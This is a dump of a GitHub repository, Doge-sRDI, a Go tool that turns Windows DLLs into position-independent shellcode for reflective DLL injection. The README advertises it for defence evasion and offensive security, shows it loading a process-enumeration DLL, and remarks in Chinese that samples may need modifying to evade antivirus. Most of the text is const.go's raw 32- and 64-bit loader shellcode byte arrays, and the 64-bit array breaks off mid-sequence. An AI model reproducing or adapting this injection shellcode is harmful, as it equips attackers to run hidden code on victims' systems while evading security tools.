├── Outflank-PsC.dll ├── README.md ├── const.go └── srdi.go /Outflank-PsC.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/timwhitez/Doge-sRDI/1f84e65849f9eb80dc44a88a04f5ea720948400b/Outflank-PsC.dll -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![Doge-sRDI](https://socialify.git.ci/timwhitez/Doge-sRDI/image?description=1&font=Raleway&forks=1&issues=1&language=1&logo=https%3A%2F%2Favatars1.githubusercontent.com%2Fu%2F36320909&owner=1&pattern=Circuit%20Board&stargazers=1&theme=Light) 2 | 3 | - 🐸Frog For Automatic Scan 4 | 5 | - 🐶Doge For Defense Evasion&Offensive Security 6 | 7 | # Doge-sRDI 8 | Shellcode implementation of Reflective DLL Injection by Golang. Convert DLLs to position independent shellcode 9 | 10 | ## Big thanks to Sliver project and leoloobeek 11 | [Sliver](https://github.com/BishopFox/sliver) 12 | 13 | [ShellcodeRDI.go](https://gist.github.com/leoloobeek/c726719d25d7e7953d4121bd93dd2ed3) 14 | 15 | [sRDI raw project](https://github.com/monoxgas/sRDI) 16 | 17 | ## Usage 18 | srdi.exe [dllName] [Args(not necessary)] [entryPoint(not necessary)] 19 | ``` 20 | PS D:\> .\srdi.exe .\Outflank-PsC.dll 21 | Outflank-PsC.bin 22 | PS D:\> .\loader.exe .\Outflank-PsC.bin 1 23 | Mess with the banana, die like the... banana? 24 | 25 | -------------------------------------------------------------------- 26 | 27 | [+] ProcessName: svchost.exe 28 | ProcessID: 3968 29 | PPID: 940 (services.exe) 30 | CreateTime: 17/03/2021 21:01 31 | Path: C:\Windows\System32\svchost.exe 32 | ImageType: 64-bit 33 | CompanyName: Microsoft Corporation 34 | Description: Windows ????? 35 | Version: 10.0.19041.867 36 | 37 | ...... 
38 | ``` 39 | 40 | ## 🚀Star Trend 41 | [![Stargazers over time](https://starchart.cc/timwhitez/Doge-sRDI.svg)](https://starchart.cc/timwhitez/Doge-sRDI) 42 | 43 | 44 | ## etc 45 | 1. 开源的样本大部分可能已经无法免杀,需要自行修改 46 | 47 | 2. 我认为基础核心代码的开源与整理能够帮助想学习的人 48 | 49 | 3. 本人从github大佬项目中学到了很多,感谢 50 | 51 | 4. 若用本人项目去进行:HW演练/红蓝对抗/APT/黑产/恶意行为/违法行为/割韭菜,等行为,本人概不负责,也与本人无关 52 | 53 | 5. 本人已不参与大小HW活动的攻击方了,若溯源到timwhite id与本人无关 54 | -------------------------------------------------------------------------------- /const.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | /* 4 | This is port of SRDI by Leo Loobeek, that we've made a few modifications to 5 | 6 | Originals: 7 | https://gist.github.com/leoloobeek/c726719d25d7e7953d4121bd93dd2ed3 8 | https://silentbreaksecurity.com/srdi-shellcode-reflective-dll-injection/ 9 | */ 10 | 11 | // Moved shellcode to it's own file to de-clutter the source code 12 | 13 | var ( 14 | rdiShellcode32 = []byte{0x83, 0xEC, 0x6C, 0x53, 0x55, 0x56, 0x57, 0xB9, 0x4C, 0x77, 0x26, 0x07, 0xE8, 0x6E, 0x06, 0x00, 0x00, 0x8B, 0xF8, 0xB9, 0x49, 0xF7, 0x02, 0x78, 0x89, 0x7C, 0x24, 0x28, 0xE8, 0x5E, 0x06, 0x00, 0x00, 0x8B, 0xF0, 0xB9, 0x58, 0xA4, 0x53, 0xE5, 0x89, 0x74, 0x24, 0x2C, 0xE8, 0x4E, 0x06, 0x00, 0x00, 0x8B, 0xD8, 0xB9, 0x10, 0xE1, 0x8A, 0xC3, 0x89, 0x5C, 0x24, 0x20, 0xE8, 0x3E, 0x06, 0x00, 0x00, 0xB9, 0xAF, 0xB1, 0x5C, 0x94, 0x89, 0x44, 0x24, 0x30, 0xE8, 0x30, 0x06, 0x00, 0x00, 0xB9, 0x33, 0x00, 0x9E, 0x95, 0x89, 0x44, 0x24, 0x34, 0xE8, 0x22, 0x06, 0x00, 0x00, 0xB9, 0x44, 0xF0, 0x35, 0xE0, 0x8B, 0xE8, 0xE8, 0x16, 0x06, 0x00, 0x00, 0x89, 0x44, 0x24, 0x40, 0x85, 0xFF, 0x0F, 0x84, 0x00, 0x06, 0x00, 0x00, 0x85, 0xF6, 0x0F, 0x84, 0xF8, 0x05, 0x00, 0x00, 0x85, 0xDB, 0x0F, 0x84, 0xF0, 0x05, 0x00, 0x00, 0x83, 0x7C, 0x24, 0x30, 0x00, 0x0F, 0x84, 0xE5, 0x05, 0x00, 0x00, 0x83, 0x7C, 0x24, 0x34, 0x00, 0x0F, 0x84, 0xDA, 0x05, 0x00, 0x00, 0x85, 0xED, 0x0F, 0x84, 0xD2, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x0F, 0x84, 0xCA, 
0x05, 0x00, 0x00, 0x8B, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x8B, 0x70, 0x3C, 0x03, 0xF0, 0x81, 0x3E, 0x50, 0x45, 0x00, 0x00, 0x0F, 0x85, 0xB2, 0x05, 0x00, 0x00, 0xB8, 0x4C, 0x01, 0x00, 0x00, 0x66, 0x39, 0x46, 0x04, 0x0F, 0x85, 0xA3, 0x05, 0x00, 0x00, 0xF6, 0x46, 0x38, 0x01, 0x0F, 0x85, 0x99, 0x05, 0x00, 0x00, 0x0F, 0xB7, 0x56, 0x06, 0x33, 0xFF, 0x0F, 0xB7, 0x46, 0x14, 0x85, 0xD2, 0x74, 0x22, 0x8D, 0x4E, 0x24, 0x03, 0xC8, 0x83, 0x79, 0x04, 0x00, 0x8B, 0x01, 0x75, 0x05, 0x03, 0x46, 0x38, 0xEB, 0x03, 0x03, 0x41, 0x04, 0x3B, 0xC7, 0x0F, 0x47, 0xF8, 0x83, 0xC1, 0x28, 0x83, 0xEA, 0x01, 0x75, 0xE3, 0x8D, 0x44, 0x24, 0x58, 0x50, 0xFF, 0xD5, 0x8B, 0x4C, 0x24, 0x5C, 0x8D, 0x51, 0xFF, 0x8D, 0x69, 0xFF, 0xF7, 0xD2, 0x03, 0x6E, 0x50, 0x8D, 0x41, 0xFF, 0x03, 0xC7, 0x23, 0xEA, 0x23, 0xC2, 0x3B, 0xE8, 0x0F, 0x85, 0x42, 0x05, 0x00, 0x00, 0x6A, 0x04, 0xBF, 0x00, 0x30, 0x00, 0x00, 0x57, 0x55, 0xFF, 0x76, 0x34, 0xFF, 0xD3, 0x8B, 0xD8, 0x89, 0x5C, 0x24, 0x24, 0x85, 0xDB, 0x75, 0x0F, 0x6A, 0x04, 0x57, 0x55, 0x50, 0xFF, 0x54, 0x24, 0x30, 0x8B, 0xD8, 0x89, 0x44, 0x24, 0x24, 0xF6, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x74, 0x28, 0x8B, 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x8B, 0x42, 0x3C, 0x89, 0x43, 0x3C, 0x8B, 0x4A, 0x3C, 0x3B, 0x4E, 0x54, 0x73, 0x31, 0x8D, 0x3C, 0x0B, 0x2B, 0xD3, 0x8A, 0x04, 0x3A, 0x41, 0x88, 0x07, 0x47, 0x3B, 0x4E, 0x54, 0x72, 0xF4, 0xEB, 0x1E, 0x33, 0xFF, 0x39, 0x7E, 0x54, 0x76, 0x17, 0x8B, 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x8B, 0xCB, 0x2B, 0xD3, 0x8A, 0x04, 0x11, 0x47, 0x88, 0x01, 0x41, 0x3B, 0x7E, 0x54, 0x72, 0xF4, 0x8B, 0x6B, 0x3C, 0x33, 0xC9, 0x03, 0xEB, 0x89, 0x4C, 0x24, 0x1C, 0x33, 0xD2, 0x89, 0x6C, 0x24, 0x14, 0x0F, 0xB7, 0x45, 0x14, 0x66, 0x3B, 0x55, 0x06, 0x73, 0x40, 0x8D, 0x75, 0x28, 0x03, 0xF0, 0x33, 0xFF, 0x39, 0x3E, 0x76, 0x25, 0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x8B, 0x46, 0x04, 0x8D, 0x14, 0x3B, 0x8B, 0x4E, 0xFC, 0x03, 0xC7, 0x47, 0x8A, 0x04, 0x28, 0x88, 0x04, 0x0A, 0x3B, 0x3E, 0x72, 0xEA, 0x8B, 0x6C, 0x24, 0x14, 0x8B, 0x4C, 0x24, 0x1C, 
0x0F, 0xB7, 0x45, 0x06, 0x41, 0x83, 0xC6, 0x28, 0x89, 0x4C, 0x24, 0x1C, 0x3B, 0xC8, 0x72, 0xC5, 0x6A, 0x01, 0x8B, 0xFB, 0x5E, 0x89, 0x74, 0x24, 0x20, 0x2B, 0x7D, 0x34, 0x74, 0x7B, 0x83, 0xBD, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x72, 0x8B, 0x95, 0xA0, 0x00, 0x00, 0x00, 0x03, 0xD3, 0x83, 0x3A, 0x00, 0x74, 0x65, 0x6A, 0x02, 0x5D, 0x8D, 0x72, 0x08, 0xEB, 0x46, 0x0F, 0xB7, 0x0E, 0x66, 0x8B, 0xC1, 0x66, 0xC1, 0xE8, 0x0C, 0x66, 0x83, 0xF8, 0x0A, 0x74, 0x06, 0x66, 0x83, 0xF8, 0x03, 0x75, 0x0D, 0x81, 0xE1, 0xFF, 0x0F, 0x00, 0x00, 0x03, 0x0A, 0x01, 0x3C, 0x19, 0xEB, 0x21, 0x66, 0x3B, 0x44, 0x24, 0x20, 0x75, 0x07, 0x8B, 0xC7, 0xC1, 0xE8, 0x10, 0xEB, 0x08, 0x66, 0x3B, 0xC5, 0x75, 0x0E, 0x0F, 0xB7, 0xC7, 0x81, 0xE1, 0xFF, 0x0F, 0x00, 0x00, 0x03, 0x0A, 0x01, 0x04, 0x19, 0x03, 0xF5, 0x8B, 0x42, 0x04, 0x03, 0xC2, 0x3B, 0xF0, 0x75, 0xB1, 0x83, 0x3E, 0x00, 0x8B, 0xD6, 0x75, 0xA5, 0x8B, 0x6C, 0x24, 0x14, 0x33, 0xF6, 0x46, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x84, 0x97, 0x01, 0x00, 0x00, 0x8B, 0x85, 0x80, 0x00, 0x00, 0x00, 0x8D, 0x0C, 0x18, 0x83, 0xC0, 0x0C, 0x03, 0xC3, 0x89, 0x4C, 0x24, 0x1C, 0x33, 0xC9, 0x89, 0x4C, 0x24, 0x18, 0x39, 0x08, 0x74, 0x0D, 0x8D, 0x40, 0x14, 0x41, 0x83, 0x38, 0x00, 0x75, 0xF7, 0x89, 0x4C, 0x24, 0x18, 0x8B, 0x94, 0x24, 0x90, 0x00, 0x00, 0x00, 0x8B, 0xC2, 0x83, 0xE0, 0x04, 0x89, 0x44, 0x24, 0x3C, 0x0F, 0x84, 0xAE, 0x00, 0x00, 0x00, 0x3B, 0xCE, 0x0F, 0x86, 0xA6, 0x00, 0x00, 0x00, 0xC1, 0xEA, 0x10, 0x8D, 0x41, 0xFF, 0x89, 0x94, 0x24, 0x90, 0x00, 0x00, 0x00, 0x33, 0xD2, 0x89, 0x44, 0x24, 0x38, 0x89, 0x54, 0x24, 0x20, 0x85, 0xC0, 0x0F, 0x84, 0x92, 0x00, 0x00, 0x00, 0x8B, 0x5C, 0x24, 0x1C, 0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x89, 0x5C, 0x24, 0x1C, 0x2B, 0xCA, 0x69, 0xED, 0xFD, 0x43, 0x03, 0x00, 0x33, 0xD2, 0x8D, 0x7C, 0x24, 0x44, 0xB8, 0xFF, 0x7F, 0x00, 0x00, 0xF7, 0xF1, 0x81, 0xC5, 0xC3, 0x9E, 0x26, 0x00, 0x33, 0xD2, 0x6A, 0x05, 0x8D, 0x48, 0x01, 0x8B, 0xC5, 0xC1, 0xE8, 0x10, 0x25, 0xFF, 0x7F, 0x00, 0x00, 0xF7, 0xF1, 0x8B, 0x54, 0x24, 0x24, 
0x03, 0xC2, 0x6B, 0xC0, 0x14, 0x59, 0x6A, 0x05, 0x03, 0xC3, 0x42, 0x8B, 0xF0, 0x89, 0x54, 0x24, 0x24, 0xF3, 0xA5, 0x8B, 0x74, 0x24, 0x20, 0x8B, 0xF8, 0x8B, 0x44, 0x24, 0x20, 0x59, 0xF3, 0xA5, 0x6A, 0x05, 0x8B, 0xF8, 0x8D, 0x74, 0x24, 0x48, 0x59, 0x83, 0xC0, 0x14, 0xF3, 0xA5, 0x8B, 0x4C, 0x24, 0x18, 0x89, 0x44, 0x24, 0x1C, 0x3B, 0x54, 0x24, 0x38, 0x72, 0x92, 0x8B, 0x5C, 0x24, 0x24, 0x8B, 0x6C, 0x24, 0x14, 0xEB, 0x0B, 0x8B, 0x44, 0x24, 0x40, 0x89, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x8B, 0xB5, 0x80, 0x00, 0x00, 0x00, 0x03, 0xF3, 0x89, 0x74, 0x24, 0x20, 0x8B, 0x46, 0x0C, 0x85, 0xC0, 0x0F, 0x84, 0x88, 0x00, 0x00, 0x00, 0x8B, 0x6C, 0x24, 0x18, 0x03, 0xC3, 0x50, 0xFF, 0x54, 0x24, 0x2C, 0x8B, 0x7E, 0x10, 0x89, 0x44, 0x24, 0x38, 0x03, 0xFB, 0x8B, 0x06, 0x03, 0xC3, 0x89, 0x44, 0x24, 0x24, 0x8B, 0x08, 0x85, 0xC9, 0x74, 0x36, 0x8B, 0x6C, 0x24, 0x38, 0x8B, 0x74, 0x24, 0x2C, 0x79, 0x05, 0x0F, 0xB7, 0xC1, 0xEB, 0x05, 0x8D, 0x41, 0x02, 0x03, 0xC3, 0x50, 0x55, 0xFF, 0xD6, 0x89, 0x07, 0x83, 0xC7, 0x04, 0x8B, 0x44, 0x24, 0x24, 0x83, 0xC0, 0x04, 0x89, 0x44, 0x24, 0x24, 0x8B, 0x08, 0x85, 0xC9, 0x75, 0xDA, 0x8B, 0x74, 0x24, 0x20, 0x8B, 0x6C, 0x24, 0x18, 0x83, 0x7C, 0x24, 0x3C, 0x00, 0x74, 0x17, 0x33, 0xC0, 0x40, 0x3B, 0xE8, 0x76, 0x10, 0x69, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0xE8, 0x03, 0x00, 0x00, 0x50, 0xFF, 0x54, 0x24, 0x44, 0x8B, 0x46, 0x20, 0x83, 0xC6, 0x14, 0x89, 0x74, 0x24, 0x20, 0x85, 0xC0, 0x75, 0x80, 0x8B, 0x6C, 0x24, 0x14, 0x83, 0xBD, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x73, 0x8B, 0xBD, 0xE0, 0x00, 0x00, 0x00, 0x83, 0xC7, 0x04, 0x03, 0xFB, 0x89, 0x7C, 0x24, 0x20, 0x83, 0x3F, 0x00, 0x74, 0x5F, 0x8B, 0x07, 0x03, 0xC3, 0x50, 0xFF, 0x54, 0x24, 0x2C, 0x8B, 0x77, 0x08, 0x8B, 0xE8, 0x8B, 0x47, 0x0C, 0x03, 0xF3, 0x03, 0xC3, 0x89, 0x44, 0x24, 0x24, 0x83, 0x3E, 0x00, 0x74, 0x31, 0x8B, 0x7C, 0x24, 0x2C, 0x8B, 0x00, 0x85, 0xC0, 0x79, 0x05, 0x0F, 0xB7, 0xC0, 0xEB, 0x05, 0x83, 0xC0, 0x02, 0x03, 0xC3, 0x50, 0x55, 0xFF, 0xD7, 0x89, 0x06, 0x83, 0xC6, 0x04, 0x8B, 0x44, 0x24, 0x24, 0x83, 
0xC0, 0x04, 0x89, 0x44, 0x24, 0x24, 0x83, 0x3E, 0x00, 0x75, 0xD7, 0x8B, 0x7C, 0x24, 0x20, 0x83, 0xC7, 0x20, 0x89, 0x7C, 0x24, 0x20, 0x83, 0x3F, 0x00, 0x75, 0xA5, 0x8B, 0x6C, 0x24, 0x14, 0x0F, 0xB7, 0x45, 0x14, 0x33, 0xC9, 0x33, 0xFF, 0x66, 0x3B, 0x4D, 0x06, 0x0F, 0x83, 0xB0, 0x00, 0x00, 0x00, 0x8D, 0x75, 0x3C, 0x03, 0xF0, 0x83, 0x7E, 0xEC, 0x00, 0x0F, 0x84, 0x91, 0x00, 0x00, 0x00, 0x8B, 0x0E, 0x33, 0xD2, 0x42, 0x8B, 0xC1, 0xC1, 0xE8, 0x1D, 0x23, 0xC2, 0x8B, 0xD1, 0xC1, 0xEA, 0x1E, 0x83, 0xE2, 0x01, 0xC1, 0xE9, 0x1F, 0x85, 0xC0, 0x75, 0x18, 0x85, 0xD2, 0x75, 0x0D, 0x6A, 0x08, 0x58, 0x6A, 0x01, 0x85, 0xC9, 0x59, 0x0F, 0x44, 0xC1, 0xEB, 0x3D, 0x6A, 0x04, 0x58, 0x6A, 0x02, 0xEB, 0xF1, 0x85, 0xD2, 0x75, 0x1E, 0x85, 0xC9, 0x75, 0x05, 0x6A, 0x10, 0x58, 0xEB, 0x29, 0x85, 0xD2, 0x75, 0x11, 0x85, 0xC9, 0x74, 0x07, 0xB8, 0x80, 0x00, 0x00, 0x00, 0xEB, 0x1A, 0x8B, 0x44, 0x24, 0x10, 0xEB, 0x18, 0x85, 0xC9, 0x75, 0x04, 0x6A, 0x20, 0xEB, 0xE0, 0x8B, 0x44, 0x24, 0x10, 0x85, 0xC9, 0x6A, 0x40, 0x5A, 0x0F, 0x45, 0xC2, 0x89, 0x44, 0x24, 0x10, 0xF7, 0x06, 0x00, 0x00, 0x00, 0x04, 0x74, 0x09, 0x0D, 0x00, 0x02, 0x00, 0x00, 0x89, 0x44, 0x24, 0x10, 0x8D, 0x4C, 0x24, 0x10, 0x51, 0x50, 0x8B, 0x46, 0xE8, 0xFF, 0x76, 0xEC, 0x03, 0xC3, 0x50, 0xFF, 0x54, 0x24, 0x40, 0x0F, 0xB7, 0x45, 0x06, 0x47, 0x83, 0xC6, 0x28, 0x3B, 0xF8, 0x0F, 0x82, 0x55, 0xFF, 0xFF, 0xFF, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0xFF, 0xFF, 0x54, 0x24, 0x40, 0x83, 0xBD, 0xC4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x26, 0x8B, 0x85, 0xC0, 0x00, 0x00, 0x00, 0x8B, 0x74, 0x18, 0x0C, 0x8B, 0x06, 0x85, 0xC0, 0x74, 0x16, 0x33, 0xED, 0x45, 0x6A, 0x00, 0x55, 0x53, 0xFF, 0xD0, 0x8D, 0x76, 0x04, 0x8B, 0x06, 0x85, 0xC0, 0x75, 0xF1, 0x8B, 0x6C, 0x24, 0x14, 0x33, 0xC0, 0x40, 0x50, 0x50, 0x8B, 0x45, 0x28, 0x53, 0x03, 0xC3, 0xFF, 0xD0, 0x83, 0xBC, 0x24, 0x84, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x84, 0xAD, 0x00, 0x00, 0x00, 0x83, 0x7D, 0x7C, 0x00, 0x0F, 0x84, 0xA3, 0x00, 0x00, 0x00, 0x8B, 0x55, 0x78, 0x03, 0xD3, 0x8B, 0x6A, 0x18, 0x85, 0xED, 0x0F, 0x84, 0x93, 0x00, 
0x00, 0x00, 0x83, 0x7A, 0x14, 0x00, 0x0F, 0x84, 0x89, 0x00, 0x00, 0x00, 0x8B, 0x7A, 0x20, 0x8B, 0x4A, 0x24, 0x03, 0xFB, 0x83, 0x64, 0x24, 0x34, 0x00, 0x03, 0xCB, 0x85, 0xED, 0x74, 0x76, 0x8B, 0x37, 0xC7, 0x44, 0x24, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x03, 0xF3, 0x74, 0x68, 0x8A, 0x06, 0x84, 0xC0, 0x74, 0x1C, 0x8B, 0x6C, 0x24, 0x1C, 0x0F, 0xBE, 0xC0, 0x03, 0xC5, 0xC1, 0xC8, 0x0D, 0x46, 0x8B, 0xE8, 0x8A, 0x06, 0x84, 0xC0, 0x75, 0xEF, 0x89, 0x6C, 0x24, 0x1C, 0x8B, 0x6A, 0x18, 0x8B, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x3B, 0x44, 0x24, 0x1C, 0x75, 0x04, 0x85, 0xC9, 0x75, 0x15, 0x8B, 0x44, 0x24, 0x34, 0x83, 0xC7, 0x04, 0x40, 0x83, 0xC1, 0x02, 0x89, 0x44, 0x24, 0x34, 0x3B, 0xC5, 0x72, 0xAC, 0xEB, 0x20, 0x0F, 0xB7, 0x09, 0x8B, 0x42, 0x1C, 0xFF, 0xB4, 0x24, 0x8C, 0x00, 0x00, 0x00, 0xFF, 0xB4, 0x24, 0x8C, 0x00, 0x00, 0x00, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x18, 0x03, 0xC3, 0xFF, 0xD0, 0x59, 0x59, 0x8B, 0xC3, 0xEB, 0x02, 0x33, 0xC0, 0x5F, 0x5E, 0x5D, 0x5B, 0x83, 0xC4, 0x6C, 0xC3, 0x83, 0xEC, 0x10, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8B, 0x40, 0x0C, 0x57, 0x89, 0x4C, 0x24, 0x18, 0x8B, 0x70, 0x0C, 0xE9, 0x8A, 0x00, 0x00, 0x00, 0x8B, 0x46, 0x30, 0x33, 0xC9, 0x8B, 0x5E, 0x2C, 0x8B, 0x36, 0x89, 0x44, 0x24, 0x14, 0x8B, 0x42, 0x3C, 0x8B, 0x6C, 0x10, 0x78, 0x89, 0x6C, 0x24, 0x10, 0x85, 0xED, 0x74, 0x6D, 0xC1, 0xEB, 0x10, 0x33, 0xFF, 0x85, 0xDB, 0x74, 0x1F, 0x8B, 0x6C, 0x24, 0x14, 0x8A, 0x04, 0x2F, 0xC1, 0xC9, 0x0D, 0x3C, 0x61, 0x0F, 0xBE, 0xC0, 0x7C, 0x03, 0x83, 0xC1, 0xE0, 0x03, 0xC8, 0x47, 0x3B, 0xFB, 0x72, 0xE9, 0x8B, 0x6C, 0x24, 0x10, 0x8B, 0x44, 0x2A, 0x20, 0x33, 0xDB, 0x8B, 0x7C, 0x2A, 0x18, 0x03, 0xC2, 0x89, 0x7C, 0x24, 0x14, 0x85, 0xFF, 0x74, 0x31, 0x8B, 0x28, 0x33, 0xFF, 0x03, 0xEA, 0x83, 0xC0, 0x04, 0x89, 0x44, 0x24, 0x1C, 0x0F, 0xBE, 0x45, 0x00, 0xC1, 0xCF, 0x0D, 0x03, 0xF8, 0x45, 0x80, 0x7D, 0xFF, 0x00, 0x75, 0xF0, 0x8D, 0x04, 0x0F, 0x3B, 0x44, 0x24, 0x18, 0x74, 0x20, 0x8B, 0x44, 0x24, 0x1C, 0x43, 0x3B, 0x5C, 0x24, 0x14, 0x72, 0xCF, 0x8B, 0x56, 0x18, 0x85, 
0xD2, 0x0F, 0x85, 0x6B, 0xFF, 0xFF, 0xFF, 0x33, 0xC0, 0x5F, 0x5E, 0x5D, 0x5B, 0x83, 0xC4, 0x10, 0xC3, 0x8B, 0x74, 0x24, 0x10, 0x8B, 0x44, 0x16, 0x24, 0x8D, 0x04, 0x58, 0x0F, 0xB7, 0x0C, 0x10, 0x8B, 0x44, 0x16, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x10, 0x03, 0xC2, 0xEB, 0xDB} 15 | 16 | rdiShellcode64 = []byte{0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x44, 0x89, 0x48, 0x20, 0x4C, 0x89, 0x40, 0x18, 0x89, 0x50, 0x10, 0x55, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0x68, 0xA9, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xF1, 0xB9, 0x4C, 0x77, 0x26, 0x07, 0xE8, 0xA3, 0x06, 0x00, 0x00, 0xB9, 0x49, 0xF7, 0x02, 0x78, 0x48, 0x89, 0x45, 0xB7, 0x4C, 0x8B, 0xE0, 0xE8, 0x92, 0x06, 0x00, 0x00, 0xB9, 0x58, 0xA4, 0x53, 0xE5, 0x48, 0x89, 0x45, 0xBF, 0x4C, 0x8B, 0xE8, 0xE8, 0x81, 0x06, 0x00, 0x00, 0xB9, 0x10, 0xE1, 0x8A, 0xC3, 0x4C, 0x8B, 0xF8, 0xE8, 0x74, 0x06, 0x00, 0x00, 0xB9, 0xAF, 0xB1, 0x5C, 0x94, 0x48, 0x89, 0x45, 0xD7, 0x48, 0x8B, 0xF8, 0xE8, 0x63, 0x06, 0x00, 0x00, 0xB9, 0x33, 0x00, 0x9E, 0x95, 0x48, 0x89, 0x45, 0xDF, 0x48, 0x8B, 0xD8, 0xE8, 0x52, 0x06, 0x00, 0x00, 0xB9, 0x44, 0xF0, 0x35, 0xE0, 0x4C, 0x8B, 0xF0, 0xE8, 0x45, 0x06, 0x00, 0x00, 0x45, 0x33, 0xD2, 0x48, 0x89, 0x45, 0xC7, 0x4D, 0x85, 0xE4, 0x0F, 0x84, 0x16, 0x06, 0x00, 0x00, 0x4D, 0x85, 0xED, 0x0F, 0x84, 0x0D, 0x06, 0x00, 0x00, 0x4D, 0x85, 0xFF, 0x0F, 0x84, 0x04, 0x06, 0x00, 0x00, 0x48, 0x85, 0xFF, 0x0F, 0x84, 0xFB, 0x05, 0x00, 0x00, 0x48, 0x85, 0xDB, 0x0F, 0x84, 0xF2, 0x05, 0x00, 0x00, 0x4D, 0x85, 0xF6, 0x0F, 0x84, 0xE9, 0x05, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x0F, 0x84, 0xE0, 0x05, 0x00, 0x00, 0x48, 0x63, 0x7E, 0x3C, 0x48, 0x03, 0xFE, 0x81, 0x3F, 0x50, 0x45, 0x00, 0x00, 0x0F, 0x85, 0xCD, 0x05, 0x00, 0x00, 0xB8, 0x64, 0x86, 0x00, 0x00, 0x66, 0x39, 0x47, 0x04, 0x0F, 0x85, 0xBE, 0x05, 0x00, 0x00, 0x44, 0x8B, 0x47, 0x38, 0x45, 0x8D, 0x5A, 0x01, 0x45, 0x84, 0xC3, 0x0F, 0x85, 0xAD, 0x05, 0x00, 0x00, 0x0F, 0xB7, 0x47, 0x06, 0x41, 0x8B, 0xDA, 0x0F, 0xB7, 0x4F, 0x14, 0x85, 0xC0, 
0x74, 0x28, 0x48, 0x83, 0xC1, 0x24, 0x44, 0x8B, 0xC8, 0x48, 0x03, 0xCF, 0x8B, 0x51, 0x04, 0x85, 0xD2, 0x75, 0x07, 0x8B, 0x11, 0x41, 0x03, 0xD0, 0xEB, 0x02, 0x03, 0x11, 0x3B, 0xD3, 0x0F, 0x47, 0xDA, 0x48, 0x83, 0xC1, 0x28, 0x4D, 0x2B, 0xCB, 0x75, 0xE2, 0x48, 0x8D, 0x4D, 0xE7, 0x41, 0xFF, 0xD6, 0x8B, 0x55, 0xEB, 0x44, 0x8D, 0x72, 0xFF, 0x44, 0x03, 0x77, 0x50, 0x8D, 0x42, 0xFF, 0xF7, 0xD0, 0x48, 0x8D, 0x4A, 0xFF, 0x44, 0x23, 0xF0, 0x8B, 0xC3, 0x48, 0x03, 0xC8, 0x48, 0x8D, 0x42, 0xFF, 0x48, 0xF7, 0xD0, 0x48, 0x23, 0xC8, 0x4C, 0x3B, 0xF1, 0x0F, 0x85, 0x40, 0x05, 0x00, 0x00, 0x48, 0x8B, 0x4F, 0x30, 0x41, 0xB9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xB8, 0x00, 0x30, 0x00, 0x00, 0x41, 0x8B, 0xD6, 0x41, 0xFF, 0xD7, 0x48, 0x8B, 0xD8, 0x48, 0x85, 0xC0, 0x75, 0x15, 0x44, 0x8D, 0x48, 0x04, 0x41, 0xB8, 0x00, 0x30, 0x00, 0x00, 0x41, 0x8B, 0xD6, 0x33, 0xC9, 0x41, 0xFF, 0xD7, 0x48, 0x8B, 0xD8, 0x44, 0x8B, 0x5D, 0x7F, 0x41, 0xBE, 0x01, 0x00, 0x00, 0x00, 0x45, 0x84, 0xDE, 0x0F, 0x84, 0xB1, 0x00, 0x00, 0x00, 0x8B, 0x46, 0x3C, 0x89, 0x43, 0x3C, 0x8B, 0x56, 0x3C, 0xEB, 0x0B, 0x8B, 0xCA, 0x41, 0x03, 0xD6, 0x8A, 0x04, 0x31, 0x88, 0x04, 0x19, 0x3B, 0x57, 0x54, 0x72, 0xF0, 0x45, 0x33, 0xFF, 0x48, 0x63, 0x7B, 0x3C, 0x45, 0x8B, 0xD7, 0x48, 0x03, 0xFB, 0x48, 0x89, 0x7D, 0xCF, 0x0F, 0xB7, 0x47, 0x14, 0x66, 0x44, 0x3B, 0x7F, 0x06, 0x73, 0x3E, 0x4C, 0x8D, 0x47, 0x28, 0x4C, 0x03, 0xC0, 0x45, 0x8B, 0xCF, 0x45, 0x39, 0x38, 0x76, 0x1F, 0x41, 0x8B, 0x50, 0x04, 0x41, 0x8B, 0x48, 0xFC, 0x41, 0x8B, 0xC1, 0x45, 0x03, 0xCE, 0x48, 0x03, 0xC8, 0x48, 0x03, 0xD0, 0x8A, 0x04, 0x32, 0x88, 0x04, 0x19, 0x45, 0x3B, 0x08, 0x72, 0xE1, 0x0F, 0xB7, 0x47, 0x06, 0x45, 0x03, 0xD6, 0x49, 0x83, 0xC0, 0x28, 0x44, 0x3B, 0xD0, 0x72, 0xC9, 0x4C, 0x8B, 0xD3, 0x4C, 0x2B, 0x57, 0x30, 0x0F, 0x84, 0xDE, 0x00, 0x00, 0x00, 0x44, 0x39, 0xBF, 0xB4, 0x00, 0x00, 0x00, 0x0F, 0x84, 0xD1, 0x00, 0x00, 0x00, 0x44, 0x8B, 0x87, 0xB0, 0x00, 0x00, 0x00, 0x4C, 0x03, 0xC3, 0x45, 0x39, 0x38, 0x0F, 0x84, 0xBE, 0x00, 0x00, 0x00, 0x41, 0xBC, 0x02, 0x00, 0x00, 
